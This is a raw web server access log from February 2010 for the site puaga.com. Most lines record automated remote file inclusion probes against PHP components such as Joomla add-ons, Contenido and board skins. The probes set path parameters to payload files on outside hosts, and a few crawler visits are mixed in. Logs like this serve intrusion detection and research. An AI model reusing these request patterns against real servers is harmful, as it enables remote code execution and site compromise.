58.150.99.144 - - [15/Feb/2010:06:12:30 -0800] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:12:30 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:12:33 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:12:34 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:12:34 -0800] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:06:12:38 -0800] "GET /logs/access_100128.log%20%20/write_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:06:12:43 -0800] "GET /logs/access_100128.log%20%20/write_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:13:27 -0800] "GET /logs/access_100127.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:13:27 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:13:27 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [15/Feb/2010:06:13:32 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [15/Feb/2010:06:13:32 -0800] "GET /logs/access_100202.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [15/Feb/2010:06:13:32 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.236.148 - - [15/Feb/2010:06:13:37 -0800] "GET /logs/access_100201.log%20%20//accounts/inc/errors.php?error=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.92.74.80 - - [15/Feb/2010:06:14:08 -0800] "GET /orange_g/forum/ HTTP/1.0" 404 5258 "http://puaga.com/orange_g/forum/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "puaga.com"
174.142.61.173 - - [15/Feb/2010:06:14:08 -0800] "GET /logs/access_100111.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.92.74.80 - - [15/Feb/2010:06:14:09 -0800] "GET / HTTP/1.0" 200 3626 "http://puaga.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "puaga.com"
82.76.12.197 - - [15/Feb/2010:06:14:09 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.steklo-vsem.ru/webalizer/.../main_products/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.puaga.com"
82.76.12.197 - - [15/Feb/2010:06:14:09 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.steklo-vsem.ru/webalizer/.../main_products/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.puaga.com"
213.239.230.130 - - [15/Feb/2010:06:16:36 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.solutionexchange-un.net.in/en//media/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
213.239.230.130 - - [15/Feb/2010:06:16:36 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.solutionexchange-un.net.in/en//media/test.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:06:17:18 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:06:17:18 -0800] "GET /logs/access_100210.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:06:17:18 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:06:17:19 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:06:17:19 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:06:17:19 -0800] "GET /logs/access_100210.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:17:30 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:17:30 -0800] "GET /logs/access_100127.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:17:31 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.187 - - [15/Feb/2010:06:17:37 -0800] "GET /ideal/ HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
219.240.36.36 - - [15/Feb/2010:06:17:48 -0800] "GET /logs/access_100104.log//twindow_notice.php?shop_this_skin_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
219.240.36.36 - - [15/Feb/2010:06:17:49 -0800] "GET /twindow_notice.php?shop_this_skin_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
204.213.93.197 - - [15/Feb/2010:06:17:49 -0800] "GET /logs///index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [15/Feb/2010:06:17:49 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [15/Feb/2010:06:17:50 -0800] "GET /logs//twindow_notice.php?shop_this_skin_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
204.213.93.197 - - [15/Feb/2010:06:17:52 -0800] "GET /logs/access_100112.log///index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [15/Feb/2010:06:17:52 -0800] "GET /logs/access_100107.log///index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:06:18:14 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:06:18:14 -0800] "GET /logs/access_100128.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:06:18:14 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:06:18:27 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:06:18:27 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:06:18:27 -0800] "GET /logs/access_100128.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [15/Feb/2010:06:18:30 -0800] "GET /write_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [15/Feb/2010:06:18:30 -0800] "GET /logs/write_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [15/Feb/2010:06:18:31 -0800] "GET /logs/access.log/write_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:06:19:02 -0800] "GET /logs/access_100210.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:06:19:13 -0800] "GET /logs/access_100210.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.187 - - [15/Feb/2010:06:19:23 -0800] "GET /ideal/?D=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [15/Feb/2010:06:19:44 -0800] "GET /ideal/?S=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [15/Feb/2010:06:19:44 -0800] "GET /ideal/?M=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
220.80.108.81 - - [15/Feb/2010:06:19:56 -0800] "GET /logs/access_100119.log/write_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.187 - - [15/Feb/2010:06:20:03 -0800] "GET /ideal/?N=D HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
173.165.1.69 - - [15/Feb/2010:06:20:14 -0800] "GET /logs/access.log/write_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:06:20:27 -0800] "GET /logs/access.log/write_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [15/Feb/2010:06:21:22 -0800] "GET /logs//skin/uks_gallery_v3010/write.php?dir=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [15/Feb/2010:06:21:22 -0800] "GET /skin/uks_gallery_v3010/write.php?dir=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [15/Feb/2010:06:21:22 -0800] "GET /logs/access_100112.log//skin/uks_gallery_v3010/write.php?dir=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:06:21:38 -0800] "GET /bbs//skin/admin/spaw/spaw_control.class.php?spaw_root=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:06:21:38 -0800] "GET /logs/access_100202.log%20%20//bbs//skin/admin/spaw/spaw_control.class.php?spaw_root=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:06:21:39 -0800] "GET /logs//bbs//skin/admin/spaw/spaw_control.class.php?spaw_root=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:06:22:04 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:06:22:04 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:06:22:04 -0800] "GET /logs/access_100113.log/modules/My_eGallery/index.php?basepath=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [15/Feb/2010:06:23:06 -0800] "GET /kr_shop.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [15/Feb/2010:06:23:50 -0800] "GET /logs/kr_shop.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:06:23:53 -0800] "GET /logs/access_100112.log%20%20//bbs//skin/admin/spaw/spaw_control.class.php?spaw_root=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [15/Feb/2010:06:24:32 -0800] "GET /logs/access_100119.log/kr_shop.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.149.110.210 - - [15/Feb/2010:06:26:19 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://copypartner.com/content/files/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.149.110.210 - - [15/Feb/2010:06:26:25 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://copypartner.com/content/files/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.149.110.210 - - [15/Feb/2010:06:26:25 -0800] "GET /logs/access_100111.log%20%20/akocomments.php?mosConfig_absolute_path=http://copypartner.com/content/files/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.149.110.210 - - [15/Feb/2010:06:26:25 -0800] "GET /logs/access_100103.log%20%20/akocomments.php?mosConfig_absolute_path=http://copypartner.com/content/files/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:06:28:22 -0800] "GET /logs/access_100128.log/write_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:06:28:54 -0800] "GET /logs/access_100128.log/write_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [15/Feb/2010:06:29:20 -0800] "GET /admin/common.inc.php?base_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [15/Feb/2010:06:29:20 -0800] "GET /logs/access_100115.log%20%20//admin/common.inc.php?base_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [15/Feb/2010:06:29:21 -0800] "GET /logs//admin/common.inc.php?base_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [15/Feb/2010:06:29:26 -0800] "GET /logs/access_100103.log%20%20//admin/common.inc.php?base_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [15/Feb/2010:06:30:05 -0800] "GET /logs/access_100202.log//akocomments.php?mosConfig_absolute_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
219.240.36.36 - - [15/Feb/2010:06:30:07 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
219.240.36.36 - - [15/Feb/2010:06:30:08 -0800] "GET /logs//akocomments.php?mosConfig_absolute_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
219.240.36.36 - - [15/Feb/2010:06:30:52 -0800] "GET /logs/access_100112.log//twindow_notice.php?shop_this_skin_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
91.121.25.16 - - [15/Feb/2010:06:31:14 -0800] "GET /logs/access_100203.log%20%20/become_editor.php?theme_path=http://millwide.com.br/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [15/Feb/2010:06:31:14 -0800] "GET /logs/become_editor.php?theme_path=http://millwide.com.br/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [15/Feb/2010:06:31:14 -0800] "GET /become_editor.php?theme_path=http://millwide.com.br/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:06:31:26 -0800] "GET /logs/access_100130.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [15/Feb/2010:06:31:30 -0800] "GET /logs/access_100127.log%20%20/become_editor.php?theme_path=http://millwide.com.br/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.181.217 - - [15/Feb/2010:06:31:34 -0800] "GET /skin/zero_vote/error.php?dir=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.181.217 - - [15/Feb/2010:06:31:34 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.181.217 - - [15/Feb/2010:06:31:36 -0800] "GET /logs/access_100205.log//skin/zero_vote/error.php?dir=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:06:31:52 -0800] "GET /logs/access_100130.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [15/Feb/2010:06:32:18 -0800] "GET /logs//admin/common.inc.php?base_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [15/Feb/2010:06:32:18 -0800] "GET /admin/common.inc.php?base_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [15/Feb/2010:06:32:24 -0800] "GET /logs/access_100125.log//akocomments.php?mosConfig_absolute_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
212.241.177.123 - - [15/Feb/2010:06:32:32 -0800] "GET /logs/access_100126.log//admin/common.inc.php?base_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [15/Feb/2010:06:32:32 -0800] "GET /logs/access_100103.log//admin/common.inc.php?base_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [15/Feb/2010:06:32:50 -0800] "GET /logs//admin/common.inc.php?base_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [15/Feb/2010:06:32:50 -0800] "GET /admin/common.inc.php?base_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [15/Feb/2010:06:33:03 -0800] "GET /logs/access_100103.log//admin/common.inc.php?base_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [15/Feb/2010:06:33:03 -0800] "GET /logs/access_100126.log//admin/common.inc.php?base_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.181.217 - - [15/Feb/2010:06:33:05 -0800] "GET /logs/access_100119.log//skin/zero_vote/error.php?dir=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:06:33:06 -0800] "GET /logs///components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:06:33:06 -0800] "GET /logs/access_100119.log%20%20///components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:06:33:06 -0800] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:06:33:27 -0800] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:06:33:27 -0800] "GET /logs/access_100119.log%20%20///components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:06:33:28 -0800] "GET /logs///components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:06:33:28 -0800] "GET /logs/access_100119.log%20%20///components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
